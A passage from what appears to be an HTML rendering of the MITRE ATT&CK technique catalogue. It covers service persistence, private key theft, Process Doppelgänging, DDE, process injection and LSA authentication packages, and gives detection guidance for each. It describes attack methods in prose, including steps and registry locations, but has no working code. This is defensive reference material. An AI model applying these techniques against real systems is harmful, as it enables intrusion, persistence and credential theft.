<p>When operating systems boot up, they can start programs or applications called services that perform background system functions. (Citation: TechNet Services) A service&#8217;s configuration information, including the file path to the service&#8217;s executable, is stored in the Windows Registry.</p>
</div>
<div class="paragraph">
<p>Adversaries may install a new service that can be configured to execute at startup by using utilities to interact with services or by directly modifying the Registry. The service name may be disguised by using a name from a related operating system or benign software with Masquerading. Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges from administrator to SYSTEM. Adversaries may also directly start services through Service Execution.</p>
</div>
<div class="paragraph">
<p>Detection: Monitor service creation through changes in the Registry and common utilities using command-line invocation. New, benign services may be created during installation of new software. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.</p>
</div>
<div class="paragraph">
<p>Tools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence. (Citation: TechNet Autoruns) Look for changes to services that do not correlate with known software, patch cycles, etc. Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data.</p>
</div>
<div class="paragraph">
<p>Monitor processes and command-line arguments for actions that could create services. Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. Services may also be created through Windows system management tools such as Windows Management Instrumentation and PowerShell, so additional logging may need to be configured to gather the appropriate data.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Windows Registry, Process monitoring, Process command-line parameters</p>
</div>
<div class="paragraph">
<p>Effective Permissions: SYSTEM</p>
</div>
<div class="paragraph">
<p>Permissions Required: Administrator, SYSTEM</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 761. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1050">https://attack.mitre.org/wiki/Technique/T1050</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/library/cc772408.aspx">https://technet.microsoft.com/en-us/library/cc772408.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/sysinternals/bb963902">https://technet.microsoft.com/en-us/sysinternals/bb963902</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_network_share_connection_removal_t1126"><a class="anchor" href="#_network_share_connection_removal_t1126"></a><a class="link" href="#_network_share_connection_removal_t1126">Network Share Connection Removal - T1126</a></h3>
<div class="paragraph">
<p>Windows shared drive and Windows Admin Shares connections can be removed when no longer needed. Net is an example utility that can be used to remove network share connections with the &lt;code&gt;net use \\system\share /delete&lt;/code&gt; command. (Citation: Technet Net Use)</p>
</div>
<div class="paragraph">
<p>Adversaries may remove share connections that are no longer useful in order to clean up traces of their operation.</p>
</div>
<div class="paragraph">
<p>Detection: Network share connections may be common depending on how an network environment is used. Monitor command-line invocation of &lt;code&gt;net use&lt;/code&gt; commands associated with establishing and removing remote shares over SMB, including following best practices for detection of Windows Admin Shares. SMB traffic between systems may also be captured and decoded to look for related network share session and file transfer activity. Windows authentication logs are also useful in determining when authenticated network shares are established and by which account, and can be used to correlate network share activity to other events to investigate potentially malicious activity.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: Process monitoring, Process command-line parameters, Packet capture, Authentication logs</p>
</div>
<div class="paragraph">
<p>Defense Bypassed: Host forensic analysis</p>
</div>
<div class="paragraph">
<p>Permissions Required: User, Administrator</p>
</div>
<div class="paragraph">
<p>System Requirements: Established network share connection to a remote system. Level of access depends on permissions of the account used.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 762. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1126">https://attack.mitre.org/wiki/Technique/T1126</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/bb490717.aspx">https://technet.microsoft.com/bb490717.aspx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_private_keys_t1145"><a class="anchor" href="#_private_keys_t1145"></a><a class="link" href="#_private_keys_t1145">Private Keys - T1145</a></h3>
<div class="paragraph">
<p>Private cryptographic keys and certificates are used for authentication, encryption/decryption, and digital signatures. (Citation: Wikipedia Public Key Crypto)</p>
</div>
<div class="paragraph">
<p>Adversaries may gather private keys from compromised systems for use in authenticating to Remote Services like SSH or for use in decrypting other collected files such as email. Common key and certificate file extensions include: .key, .pgp, .gpg, .ppk., .p12, .pem, pfx, .cer, .p7b, .asc. Adversaries may also look in common key directories, such as &lt;code&gt;~/.ssh&lt;/code&gt; for SSH keys on *nix-based systems or &lt;code&gt;C:\Users\(username)\.ssh\&lt;/code&gt; on Windows.</p>
</div>
<div class="paragraph">
<p>Private keys should require a password or passphrase for operation, so an adversary may also use Input Capture for keylogging or attempt to Brute Force the passphrase off-line.</p>
</div>
<div class="paragraph">
<p>Adversary tools have been discovered that search compromised systems for file extensions relating to cryptographic keys and certificates. (Citation: Kaspersky Careto) (Citation: Palo Alto Prince of Persia)</p>
</div>
<div class="paragraph">
<p>Detection: Monitor access to files and directories related to cryptographic keys and certificates as a means for potentially detecting access patterns that may indicate collection and exfiltration activity. Collect authentication logs and look for potentially abnormal activity that may indicate improper use of keys or certificates for remote authentication.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, Windows, macOS</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring</p>
</div>
<div class="paragraph">
<p>Permissions Required: User</p>
</div>
<div class="paragraph">
<p>Contributors: Itzik Kotler, SafeBreach</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 763. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1145">https://attack.mitre.org/wiki/Technique/T1145</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://en.wikipedia.org/wiki/Public-key%20cryptography">https://en.wikipedia.org/wiki/Public-key%20cryptography</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask%20v1.0.pdf">https://kasperskycontenthub.com/wp-content/uploads/sites/43/vlpdfs/unveilingthemask%20v1.0.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/">https://researchcenter.paloaltonetworks.com/2016/06/unit42-prince-of-persia-game-over/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_process_doppelgänging_t1186"><a class="anchor" href="#_process_doppelgänging_t1186"></a><a class="link" href="#_process_doppelgänging_t1186">Process Doppelgänging - T1186</a></h3>
<div class="paragraph">
<p>Windows Transactional NTFS (TxF) was introduced in Vista as a method to perform safe file operations. (Citation: Microsoft TxF) To ensure data integrity, TxF enables only one transacted handle to write to a file at a given time. Until the write handle transaction is terminated, all other handles are isolated from the writer and may only read the committed version of the file that existed at the time the handle was opened. (Citation: Microsoft Basic TxF Concepts) To avoid corruption, TxF performs an automatic rollback if the system or application fails during a write transaction. (Citation: Microsoft Where to use TxF)</p>
</div>
<div class="paragraph">
<p>Although deprecated, the TxF application programming interface (API) is still enabled as of Windows 10. (Citation: BlackHat Process Doppelgänging Dec 2017)</p>
</div>
<div class="paragraph">
<p>Adversaries may leverage TxF to a perform a file-less variation of Process Injection called Process Doppelgänging. Similar to Process Hollowing, Process Doppelgänging involves replacing the memory of a legitimate process, enabling the veiled execution of malicious code that may evade defenses and detection. Process Doppelgänging&#8217;s use of TxF also avoids the use of highly-monitored API functions such as NtUnmapViewOfSection, VirtualProtectEx, and SetThreadContext. (Citation: BlackHat Process Doppelgänging Dec 2017)</p>
</div>
<div class="paragraph">
<p>Process Doppelgänging is implemented in 4 steps (Citation: BlackHat Process Doppelgänging Dec 2017):
* Transact Create a TxF transaction using a legitimate executable then overwrite the file with malicious code. These changes will be isolated and only visible within the context of the transaction.
* Load Create a shared section of memory and load the malicious executable.
* Rollback Undo changes to original executable, effectively removing malicious code from the file system.
* Animate Create a process from the tainted section of memory and initiate execution.</p>
</div>
<div class="paragraph">
<p>Detection: Monitor and analyze calls to CreateTranscation, CreateFileTransacted, RollbackTransaction, and other rarely used functions indicative of TxF activity. Process Doppelgänging also invokes an outdated and undocumented implementation of the Windows process loader via calls to NtCreateProcessEx and NtCreateThreadEx as well as API calls used to modify memory within another process, such as WriteProcessMemory. (Citation: BlackHat Process Doppelgänging Dec 2017) (Citation: hasherezade Process Doppelgänging Dec 2017)</p>
</div>
<div class="paragraph">
<p>Scan file objects reported during the PsSetCreateProcessNotifyRoutine, (Citation: Microsoft PsSetCreateProcessNotifyRoutine routine) which triggers a callback whenever a process is created or deleted, specifically looking for file objects with enabled write access. (Citation: BlackHat Process Doppelgänging Dec 2017) Also consider comparing file objects loaded in memory to the corresponding file on disk. (Citation: hasherezade Process Doppelgänging Dec 2017)</p>
</div>
<div class="paragraph">
<p>Analyze process behavior to determine if a process is performing actions it usually does not, such as opening network connections, reading files, or other suspicious actions that could relate to post-compromise behavior.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: API monitoring, Process Monitoring</p>
</div>
<div class="paragraph">
<p>Defense Bypassed: Process whitelisting, Anti-virus, Whitelisting by file name or path, Signature-based detection</p>
</div>
<div class="paragraph">
<p>Permissions Required: User, Administrator, SYSTEM</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 764. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1186">https://attack.mitre.org/wiki/Technique/T1186</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/library/windows/desktop/bb968806.aspx">https://msdn.microsoft.com/library/windows/desktop/bb968806.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/library/windows/desktop/dd979526.aspx">https://msdn.microsoft.com/library/windows/desktop/dd979526.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/library/windows/desktop/aa365738.aspx">https://msdn.microsoft.com/library/windows/desktop/aa365738.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf">https://www.blackhat.com/docs/eu-17/materials/eu-17-Liberman-Lost-In-Transaction-Process-Doppelganging.pdf</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://hshrzd.wordpress.com/2017/12/18/process-doppelganging-a-new-way-to-impersonate-a-process/">https://hshrzd.wordpress.com/2017/12/18/process-doppelganging-a-new-way-to-impersonate-a-process/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/library/windows/hardware/ff559951.aspx">https://msdn.microsoft.com/library/windows/hardware/ff559951.aspx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dynamic_data_exchange_t1173"><a class="anchor" href="#_dynamic_data_exchange_t1173"></a><a class="link" href="#_dynamic_data_exchange_t1173">Dynamic Data Exchange - T1173</a></h3>
<div class="paragraph">
<p>Windows Dynamic Data Exchange (DDE) is a client-server protocol for one-time and/or continuous inter-process communication (IPC) between applications. Once a link is established, applications can autonomously exchange transactions consisting of strings, warm data links (notifications when a data item changes), hot data links (duplications of changes to a data item), and requests for command execution.</p>
</div>
<div class="paragraph">
<p>Object Linking and Embedding (OLE), or the ability to link data between documents, was originally implemented through DDE. Despite being superseded by COM, DDE is still enabled in Windows 10 and most of Microsoft Office 2016 (a December 2017 patch created a Registry key that disables DDE in Word by default). (Citation: BleepingComputer DDE Disabled in Word Dec 2017)</p>
</div>
<div class="paragraph">
<p>Adversaries may use DDE to execute arbitrary commands. Microsoft Office documents can be poisoned with DDE commands (Citation: SensePost PS DDE May 2016) (Citation: Kettle CSV DDE Aug 2014) and used to deliver execution via spear phishing campaigns or hosted Web content, avoiding the use of Visual Basic for Applications (VBA) macros. (Citation: SensePost MacroLess DDE Oct 2017) DDE could also be leveraged by an adversary operating on a compromised machine who does not have direct access to command line execution.</p>
</div>
<div class="paragraph">
<p>Detection: OLE and Office Open XML files can be scanned for DDEAUTO', DDE, and other strings indicative of DDE execution. (Citation: NVisio Labs DDE Detection Oct 2017)</p>
</div>
<div class="paragraph">
<p>Monitor for Microsoft Office applications loading DLLs and other modules not typically associated with the application.</p>
</div>
<div class="paragraph">
<p>Monitor for spawning of unusual processes (such as cmd.exe) from Microsoft Office applications.</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: API monitoring, DLL monitoring, Process Monitoring, Windows Registry, Windows event logs</p>
</div>
<div class="paragraph">
<p>Permissions Required: User</p>
</div>
<div class="paragraph">
<p>Remote Support: No</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 765. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1173">https://attack.mitre.org/wiki/Technique/T1173</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/microsoft/microsoft-disables-dde-feature-in-word-to-prevent-further-malware-attacks/">https://www.bleepingcomputer.com/news/microsoft/microsoft-disables-dde-feature-in-word-to-prevent-further-malware-attacks/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://sensepost.com/blog/2016/powershell-c-sharp-and-dde-the-power-within/">https://sensepost.com/blog/2016/powershell-c-sharp-and-dde-the-power-within/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.contextis.com/blog/comma-separated-vulnerabilities">https://www.contextis.com/blog/comma-separated-vulnerabilities</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/">https://sensepost.com/blog/2017/macro-less-code-exec-in-msword/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.nviso.be/2017/10/11/detecting-dde-in-ms-office-documents/">https://blog.nviso.be/2017/10/11/detecting-dde-in-ms-office-documents/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_rc_common_t1163"><a class="anchor" href="#_rc_common_t1163"></a><a class="link" href="#_rc_common_t1163">Rc.common - T1163</a></h3>
<div class="paragraph">
<p>During the boot process, macOS and Linux both execute &lt;code&gt;source /etc/rc.common&lt;/code&gt;, which is a shell script containing various utility functions. This file also defines routines for processing command-line arguments and for gathering system settings, and is thus recommended to include in the start of Startup Item Scripts (Citation: Startup Items). In macOS and OS X, this is now a deprecated technique in favor of launch agents and launch daemons, but is currently still used.</p>
</div>
<div class="paragraph">
<p>Adversaries can use the rc.common file as a way to hide code for persistence that will execute on each reboot as the root user (Citation: Methods of Mac Malware Persistence).</p>
</div>
<div class="paragraph">
<p>Detection: The &lt;code&gt;/etc/rc.common&lt;/code&gt; file can be monitored to detect changes from the company policy. Monitor process execution resulting from the rc.common script for unusual or unknown applications or behavior.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS</p>
</div>
<div class="paragraph">
<p>Data Sources: File monitoring, Process Monitoring</p>
</div>
<div class="paragraph">
<p>Permissions Required: root</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 766. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1163">https://attack.mitre.org/wiki/Technique/T1163</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html">https://developer.apple.com/library/content/documentation/MacOSX/Conceptual/BPSystemStartup/Chapters/StartupItems.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf">https://www.virusbulletin.com/uploads/pdf/conference/vb2014/VB2014-Wardle.pdf</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_process_injection_t1055"><a class="anchor" href="#_process_injection_t1055"></a><a class="link" href="#_process_injection_t1055">Process Injection - T1055</a></h3>
<div class="paragraph">
<p>Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process&#8217;s memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.</p>
</div>
<div class="paragraph">
<p>===Windows===</p>
</div>
<div class="paragraph">
<p>There are multiple approaches to injecting code into a live process. Windows implementations include: (Citation: Engame Process Injection July 2017)
* '''Dynamic-link library (DLL) injection''' involves writing the path to a malicious DLL inside a process then invoking execution by creating a remote thread.
* '''Portable executable injection''' involves writing malicious code directly into the process (without a file on disk) then invoking execution with either additional code or by creating a remote thread. The displacement of the injected code introduces the additional requirement for functionality to remap memory references. Variations of this method such as reflective DLL injection (writing a self-mapping DLL into a process) and memory module (map DLL when writing into process) overcome the address relocation issue. (Citation: Endgame HuntingNMemory June 2017)
* '''Thread execution hijacking''' involves injecting malicious code or the path to a DLL into a thread of a process. Similar to Process Hollowing, the thread must first be suspended.
* '''Asynchronous Procedure Call''' (APC) injection involves attaching malicious code to the APC Queue (Citation: Microsoft APC) of a process&#8217;s thread. Queued APC functions are executed when the thread enters an alterable state. AtomBombing (Citation: ENSIL AtomBombing Oct 2016) is a variation that utilizes APCs to invoke malicious code previously written to the global atom table. (Citation: Microsoft Atom Table)
* '''Thread Local Storage''' (TLS) callback injection involves manipulating pointers inside a portable executable (PE) to redirect a process to malicious code before reaching the code&#8217;s legitimate entry point. (Citation: FireEye TLS Nov 2017)</p>
</div>
<div class="paragraph">
<p>===Mac and Linux===</p>
</div>
<div class="paragraph">
<p>Implementations for Linux and OS X/macOS systems include: (Citation: Datawire Code Injection) (Citation: Uninformed Needle)
*'''LD_PRELOAD, LD_LIBRARY_PATH''' (Linux), '''DYLD_INSERT_LIBRARIES''' (Mac OS X) environment variables, or the dlfcn application programming interface (API) can be used to dynamically load a library (shared object) in a process which can be used to intercept API calls from the running process. (Citation: Phrack halfdead 1997)
*'''Ptrace system calls''' can be used to attach to a running process and modify it in runtime. (Citation: Uninformed Needle)
*'''/proc/[pid]/mem''' provides access to the memory of the process and can be used to read/write arbitrary data to it. This technique is very rare due to its complexity. (Citation: Uninformed Needle)
*'''VDSO hijacking''' performs runtime injection on ELF binaries by manipulating code stubs mapped in from the linux-vdso.so shared object. (Citation: VDSO hijack 2009)</p>
</div>
<div class="paragraph">
<p>Malware commonly utilizes process injection to access system resources through which Persistence and other environment modifications can be made. More sophisticated samples may perform multiple process injections to segment modules and further evade detection, utilizing named pipes or other inter-process communication (IPC) mechanisms as a communication channel.</p>
</div>
<div class="paragraph">
<p>Detection: Monitoring Windows API calls indicative of the various types of code injection may generate a significant amount of data and may not be directly useful for defense unless collected under specific circumstances for known bad sequences of calls, since benign use of API functions may be common and difficult to distinguish from malicious behavior. API calls such as CreateRemoteThread, SuspendThread/SetThreadContext/ResumeThread, QueueUserAPC, and those that can be used to modify memory within another process, such as WriteProcessMemory, may be used for this technique. (Citation: Engame Process Injection July 2017)</p>
</div>
<div class="paragraph">
<p>Monitoring for Linux specific calls such as the ptrace system call, the use of LD_PRELOAD environment variable, or dlfcn dynamic linking API calls, should not generate large amounts of data due to their specialized nature, and can be a very effective method to detect some of the common process injection methods. (Citation: ArtOfMemoryForensics) (Citation: GNU Acct) (Citation: RHEL auditd) (Citation: Chokepoint preload rootkits)</p>
</div>
<div class="paragraph">
<p>Monitor for named pipe creation and connection events (Event IDs 17 and 18) for possible indicators of infected processes with external modules. (Citation: Microsoft Sysmon v6 May 2017)</p>
</div>
<div class="paragraph">
<p>Monitor processes and command-line arguments for actions that could be done before or after code injection has occurred and correlate the information with related event information. Code injection may also be performed using PowerShell with tools such as PowerSploit, (Citation: Powersploit) so additional PowerShell monitoring may be required to cover known implementations of this behavior.</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: API monitoring, Windows Registry, File monitoring, DLL monitoring, Named Pipes, Process Monitoring</p>
</div>
<div class="paragraph">
<p>Effective Permissions: User, Administrator, SYSTEM, root</p>
</div>
<div class="paragraph">
<p>Defense Bypassed: Process whitelisting, Anti-virus</p>
</div>
<div class="paragraph">
<p>Permissions Required: User, Administrator, SYSTEM, root</p>
</div>
<div class="paragraph">
<p>Contributors: Anastasios Pingios</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 767. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1055">https://attack.mitre.org/wiki/Technique/T1055</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://github.com/mattifestation/PowerSploit">https://github.com/mattifestation/PowerSploit</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process">https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.endgame.com/blog/technical-blog/hunting-memory">https://www.endgame.com/blog/technical-blog/hunting-memory</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/library/windows/desktop/ms681951.aspx">https://msdn.microsoft.com/library/windows/desktop/ms681951.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.ensilo.com/atombombing-brand-new-code-injection-for-windows">https://blog.ensilo.com/atombombing-brand-new-code-injection-for-windows</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/library/windows/desktop/ms649053.aspx">https://msdn.microsoft.com/library/windows/desktop/ms649053.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html">https://www.fireeye.com/blog/threat-research/2017/11/ursnif-variant-malicious-tls-callback-technique.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.datawire.io/code-injection-on-linux-and-macos/">https://www.datawire.io/code-injection-on-linux-and-macos/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://hick.org/code/skape/papers/needle.txt">http://hick.org/code/skape/papers/needle.txt</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://phrack.org/issues/51/8.html">http://phrack.org/issues/51/8.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://vxer.org/lib/vrn00.html">http://vxer.org/lib/vrn00.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.gnu.org/software/acct/">https://www.gnu.org/software/acct/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://access.redhat.com/documentation/red%20hat%20enterprise%20linux/6/html/security%20guide/chap-system%20auditing">https://access.redhat.com/documentation/red%20hat%20enterprise%20linux/6/html/security%20guide/chap-system%20auditing</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html">http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://docs.microsoft.com/sysinternals/downloads/sysmon">https://docs.microsoft.com/sysinternals/downloads/sysmon</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_authentication_package_t1131"><a class="anchor" href="#_authentication_package_t1131"></a><a class="link" href="#_authentication_package_t1131">Authentication Package - T1131</a></h3>
<div class="paragraph">
<p>Windows Authentication Package DLLs are loaded by the Local Security Authority (LSA) process at system start. They provide support for multiple logon processes and multiple security protocols to the operating system. (Citation: MSDN Authentication Packages)</p>
</div>
<div class="paragraph">
<p>Adversaries can use the autostart mechanism provided by LSA Authentication Packages for persistence by placing a reference to a binary in the Windows Registry location &lt;code&gt;HKLM\SYSTEM\CurrentControlSet\Control\Lsa\&lt;/code&gt; with the key value of &lt;code&gt;"Authentication Packages"=&lt;target binary&gt;&lt;/code&gt;. The binary will then be executed by the system when the authentication packages are loaded.</p>
</div>
<div class="paragraph">
<p>Detection: Monitor the Registry for changes to the LSA Registry keys. Monitor the LSA process for DLL loads. Windows 8.1 and Windows Server 2012 R2 may generate events when unsigned DLLs try to load into the LSA by setting the Registry key &lt;code&gt;HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\LSASS.exe&lt;/code&gt; with AuditLevel = 8. (Citation: Graeber 2014) (Citation: Microsoft Configure LSA)</p>
</div>
<div class="paragraph">
<p>Platforms: Windows</p>
</div>
<div class="paragraph">
<p>Data Sources: DLL monitoring, Windows Registry, Loaded DLLs</p>
</div>
<div class="paragraph">
<p>Permissions Required: Administrator</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 768. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Technique/T1131">https://attack.mitre.org/wiki/Technique/T1131</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx">https://msdn.microsoft.com/library/windows/desktop/aa374733.aspx</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html">http://docplayer.net/20839173-Analysis-of-malicious-security-support-provider-dlls.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://technet.microsoft.com/en-us/library/dn408187.aspx">https://technet.microsoft.com/en-us/library/dn408187.aspx</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_multilayer_encryption_t1079"><a class="anchor" href="#_multilayer_encryption_t1079"></a><a class="link" href="#_multilayer_encryption_t1079">Multilayer Encryption - T1079</a></h3>
<div class="paragraph">
<p>An adversary performs C2 communications using multiple layers of encryption, typically (but not exclusively) tunneling a custom encryption scheme within a protocol encryption scheme such as HTTPS or SMTPS.</p>
</div>
<div class="paragraph">
<p>Detection: If malware uses Standard Cryptographic Protocol, SSL/TLS inspection can be used to detect command and control traffic within some encrypted communication channels. (Citation: SANS Decrypting SSL) SSL/TLS inspection does come with certain risks that should be considered before implementing to avoid potential security issues such as incomplete certificate validation. (Citation: SEI SSL Inspection Risks) After SSL/TLS inspection, additional cryptographic analysis may be needed to analyze the second layer of encryption.</p>
</div>
<div class="paragraph">
<p>With Custom Cryptographic Protocol, if malware uses encryption with symmetric keys, it may be possible to obtain the algorithm and key from samples and use them to decode network traffic to detect malware communications signatures. (Citation: Fidelis DarkComet)</p>
</div>
<div class="paragraph">
<p>In general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)</p>
</div>
<div class="paragraph">
<p>Platforms: Linux, macOS, Windows</p>
</div>
<div class="paragraph">
